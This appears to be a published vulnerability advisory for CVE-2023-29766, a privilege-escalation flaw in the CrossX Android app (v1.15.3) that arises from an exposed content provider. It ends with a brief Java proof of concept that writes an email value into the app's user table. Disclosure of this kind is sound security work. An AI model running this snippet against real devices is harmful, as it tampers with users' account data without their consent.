Headline
CVE-2023-29766: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause an escalation of Privileges via the database files.
Escalation of Privileges exists in CrossX(CVE-2023-29766)
Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)
Affected product: CrossX(com.startapps.crossx)
Version: 1.15.3
Download link:https://play.google.com/store/apps/details?id=com.startapps.crossx
Description of the vulnerability for use in the CVE:An issue found in CrossX v.1.15.3 allows a local attacker to cause an escalation of Privileges via the database files.
Additional information: The CrossX application allows unauthorized applications to use the methods provided in its exposed components to modify data in the Database file, which is loaded at application startup and affects critical application functionality. For example, modify the user’s personal data, resulting in an escalation of privilege attack.
poc:
public void attack_crossx() { Uri uri = Uri.parse(“content://com.startapps.crossx.contentprovider/tb_user”); ContentResolver contentResolver = getApplicationContext().getContentResolver(); ContentValues contentValues = new ContentValues(); contentValues.put("email", targetVaule); contentResolver.insert(uri, contentValues); }